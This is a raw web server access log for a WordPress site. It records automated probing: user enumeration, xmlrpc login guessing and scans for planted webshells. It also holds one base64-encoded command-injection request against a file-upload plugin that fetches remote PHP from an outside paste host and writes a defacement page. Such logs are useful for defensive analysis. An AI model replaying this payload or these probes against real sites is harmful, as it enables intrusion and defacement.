37.27.132.172 - - [30/Mar/2025:08:27:12 -0400] "GET /what-is-an-air-cooler/ HTTP/1.1" 200 12204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
142.93.182.3 - - [30/Mar/2025:08:50:43 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:50:44 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:50:45 -0400] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:50:52 -0400] "GET /?author=1 HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:50:52 -0400] "GET /?author=2 HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:50:53 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 1381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:50:55 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:50:56 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:50:57 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:50:58 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:51:00 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
142.93.182.3 - - [30/Mar/2025:08:51:02 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:09:28:16 -0400] "POST /wp-cron.php?doing_wp_cron=1743341296.2127070426940917968750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
80.64.30.32 - - [30/Mar/2025:09:28:01 -0400] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 302 0 "http://inversionesgoldie.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:09:36:42 -0400] "POST /wp-cron.php?doing_wp_cron=1743341801.7022819519042968750000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
80.64.30.32 - - [30/Mar/2025:09:36:24 -0400] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 302 0 "http://inversionesgoldie.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
198.54.114.83 - - [30/Mar/2025:09:45:32 -0400] "POST /wp-cron.php?doing_wp_cron=1743342332.0964589118957519531250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
80.64.30.32 - - [30/Mar/2025:09:45:22 -0400] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 302 0 "http://inversionesgoldie.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0"
196.251.69.226 - - [30/Mar/2025:09:47:49 -0400] "POST /wp-content/plugins/about.php HTTP/1.1" 403 1242 "http://inversionesgoldie.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:09:47:50 -0400] "POST /wp-cron.php?doing_wp_cron=1743342470.6967720985412597656250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
196.251.69.226 - - [30/Mar/2025:09:47:50 -0400] "GET /wp-content/about.php HTTP/1.1" 404 8272 "http://inversionesgoldie.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
196.251.69.226 - - [30/Mar/2025:09:47:57 -0400] "POST /wp-content/plugins/about.php HTTP/1.1" 403 1242 "http://inversionesgoldie.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
196.251.69.226 - - [30/Mar/2025:09:47:57 -0400] "GET /wp-content/about.php HTTP/1.1" 404 8272 "http://inversionesgoldie.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
196.251.69.226 - - [30/Mar/2025:09:48:01 -0400] "POST /wp.php HTTP/1.1" 403 1242 "http://inversionesgoldie.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
196.251.69.226 - - [30/Mar/2025:09:48:02 -0400] "GET /about.php HTTP/1.1" 404 8272 "http://inversionesgoldie.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:09:59:12 -0400] "POST /wp-cron.php?doing_wp_cron=1743343152.8056409358978271484375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
156.228.95.207 - - [30/Mar/2025:09:59:12 -0400] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
156.228.95.207 - - [30/Mar/2025:09:59:13 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 404 8274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
156.228.95.207 - - [30/Mar/2025:09:59:16 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:10:10:20 -0400] "POST /wp-cron.php?doing_wp_cron=1743343819.8853349685668945312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
196.251.69.226 - - [30/Mar/2025:10:10:16 -0400] "GET /simple.php HTTP/1.1" 404 8272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
202.69.38.12 - - [30/Mar/2025:10:10:40 -0400] "HEAD / HTTP/1.1" 200 0 "https://inversionesgoldie.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
196.251.69.226 - - [30/Mar/2025:10:11:29 -0400] "GET /inputs.php HTTP/1.1" 404 8271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
167.71.21.36 - - [30/Mar/2025:10:19:46 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.54.114.83 - - [30/Mar/2025:10:19:48 -0400] "POST /wp-cron.php?doing_wp_cron=1743344386.8143889904022216796875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
198.54.114.83 - - [30/Mar/2025:10:26:15 -0400] "POST /wp-cron.php?doing_wp_cron=1743344774.6009900569915771484375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
45.148.10.237 - - [30/Mar/2025:10:26:13 -0400] "GET /format.js HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
196.251.88.242 - - [30/Mar/2025:10:27:08 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:10:27:18 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:10:27:30 -0400] "GET /hk.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:11:12:01 -0400] "POST /wp-cron.php?doing_wp_cron=1743347521.2304179668426513671875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
196.251.69.226 - - [30/Mar/2025:11:11:58 -0400] "GET /thoms.php HTTP/1.1" 404 8272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:11:23:08 -0400] "POST /wp-cron.php?doing_wp_cron=1743348187.6821138858795166015625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
2602:fb54:3c1:: - - [30/Mar/2025:11:23:07 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 8272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.243 - - [30/Mar/2025:11:28:57 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:11:28:57 -0400] "POST /wp-cron.php?doing_wp_cron=1743348537.4078209400177001953125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
198.54.114.83 - - [30/Mar/2025:11:28:57 -0400] "POST /wp-cron.php?doing_wp_cron=1743348537.4079949855804443359375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
196.251.80.243 - - [30/Mar/2025:11:28:56 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.80.243 - - [30/Mar/2025:11:28:56 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 8272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.243 - - [30/Mar/2025:11:28:56 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 404 8225 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.243 - - [30/Mar/2025:11:28:56 -0400] "POST /wp-plain.php HTTP/1.1" 404 8225 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.243 - - [30/Mar/2025:11:28:58 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 404 8225 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.243 - - [30/Mar/2025:11:28:58 -0400] "GET /sqigicvq.php?Fox=d3wL7 HTTP/1.1" 404 8272 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:11:51:12 -0400] "POST /wp-cron.php?doing_wp_cron=1743349872.0725729465484619140625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
195.20.18.175 - - [30/Mar/2025:11:51:11 -0400] "GET /admin/assets/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg HTTP/1.1" 301 0 "-" "ALittle Client"
198.54.114.83 - - [30/Mar/2025:11:52:24 -0400] "POST /wp-cron.php?doing_wp_cron=1743349944.0854220390319824218750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
195.20.18.175 - - [30/Mar/2025:11:52:23 -0400] "GET /admin/assets/jquery-file-upload/server/php/?file=tf2rghf.jpg HTTP/1.1" 404 8272 "-" "ALittle Client"
198.54.114.83 - - [30/Mar/2025:12:39:54 -0400] "POST /wp-cron.php?doing_wp_cron=1743352793.9409930706024169921875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
139.99.62.111 - - [30/Mar/2025:12:39:51 -0400] "GET /plugins/filemanager/dialog.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
198.54.114.83 - - [30/Mar/2025:12:52:19 -0400] "POST /wp-cron.php?doing_wp_cron=1743353539.3032720088958740234375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
139.99.68.31 - - [30/Mar/2025:12:52:19 -0400] "GET /wp-content/plugins/include.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:19 -0400] "GET /wp-2019.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:20 -0400] "GET /admin.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:21 -0400] "GET /about.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:21 -0400] "GET /users.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:21 -0400] "GET /wp-includes/pomo/about.php HTTP/1.1" 404 8271 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:22 -0400] "GET /install.php HTTP/1.1" 404 8271 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:23 -0400] "GET /wp-includes/certificates/wp.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:23 -0400] "GET /wp-content/plugins/wp-catcher/admin.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:23 -0400] "GET /wp-content/plugins/wp-catcher/cong.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:24 -0400] "GET /images/wp-login.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:24 -0400] "GET /wp-content/uploads/duck.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:25 -0400] "GET /wp-content/plugins/seoo/alfanew.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:26 -0400] "GET /wp-content/themes/pridmag/byp.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:26 -0400] "GET /cux.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:26 -0400] "GET /.tmb/file.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:27 -0400] "GET /wp-admin.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:28 -0400] "GET /wp-includes/Requests/network.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:29 -0400] "GET /.well-known/pki-validation/content.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:29 -0400] "GET /wp-content/themes.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:30 -0400] "GET /wp-content/wp-cron.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:30 -0400] "GET /wp-admin/maint/index.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:31 -0400] "GET /wp-admin/maint/ HTTP/1.1" 403 1242 "http://inversionesgoldie.com/wp-admin/maint/index.php" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:31 -0400] "GET /.well-known/pki-validation/about_php1.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:31 -0400] "GET /gif.php HTTP/1.1" 404 8271 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:32 -0400] "GET /.well-known/pki-validation/file.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:32 -0400] "GET /.well-known/pki-validation/classwithtostring.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:32 -0400] "GET /.well-known/pki-validation/file.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:33 -0400] "GET /wp-includes/images/media/about.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:34 -0400] "GET /.well-known/pki-validation/worksec.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:34 -0400] "GET /wp-content/plugins/pwnd/autoload_classmap.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:34 -0400] "GET /wp-content/themes/evita/about.php HTTP/1.1" 404 8274 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:35 -0400] "GET /wp-includes/ID3/wp-corn-sample.php HTTP/1.1" 404 8274 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:36 -0400] "GET /wp-includes/ID3/upfile.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:36 -0400] "GET /wp-includes/Requests/about.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:37 -0400] "GET /menu.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:38 -0400] "GET /function.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:38 -0400] "GET /m.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:39 -0400] "GET /wp-admin/images/install.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:40 -0400] "GET /.well-known/pki-validation/set.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:40 -0400] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:41 -0400] "GET /wsa.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:42 -0400] "GET /xleet.php HTTP/1.1" 404 8271 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:42 -0400] "GET /web.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:43 -0400] "GET /ws.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:44 -0400] "GET /simple.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:44 -0400] "GET /wp-content/upgrade/about.php HTTP/1.1" 404 8274 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:45 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:46 -0400] "GET /index.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:47 -0400] "GET / HTTP/1.1" 200 98560 "http://inversionesgoldie.com/index.php" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:47 -0400] "GET /wp-admin/user/about.php HTTP/1.1" 302 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:50 -0400] "GET /wp-content/upgrade/cloud.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:51 -0400] "GET /moon.php HTTP/1.1" 404 8271 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:52 -0400] "GET /inc.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:53 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:54 -0400] "GET /about.php?525 HTTP/1.1" 404 8274 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:55 -0400] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:55 -0400] "GET /wp-content/plugins/linkpreview/index.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:56 -0400] "GET /wp-content/plugins/linkpreview/ HTTP/1.1" 404 8272 "http://inversionesgoldie.com/wp-content/plugins/linkpreview/index.php" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:56 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:57 -0400] "GET /wp-includes/install.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:58 -0400] "GET /content.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:58 -0400] "GET /amaxx.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:52:59 -0400] "GET /chosen.php?p= HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:00 -0400] "GET /chosen.php HTTP/1.1" 404 8273 "http://inversionesgoldie.com/chosen.php?p=" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:00 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:01 -0400] "GET /wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:01 -0400] "GET /wp-includes/js/tinymce/plugins/compat3x/css/ HTTP/1.1" 403 1242 "http://inversionesgoldie.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:02 -0400] "GET /wp-signup.php?FoX=sQFLZ HTTP/1.1" 302 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:03 -0400] "GET /wp.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:04 -0400] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:04 -0400] "GET /wp-content/about.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:04 -0400] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 403 1242 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:04 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:05 -0400] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:06 -0400] "GET /wp-content/plugins/revslider/includes/external/page/ HTTP/1.1" 404 8272 "http://inversionesgoldie.com/wp-content/plugins/revslider/includes/external/page/index.php" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:07 -0400] "GET /wp-includes/class-wp-page-icon.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:08 -0400] "GET /dropdown.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:08 -0400] "GET /.well-known/plugins.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:09 -0400] "GET /wp-content/item.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:10 -0400] "GET /wp-content/uploads/zcache.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:10 -0400] "GET /wp-admin/wso.php HTTP/1.1" 404 8271 "-" "Go-http-client/1.1"
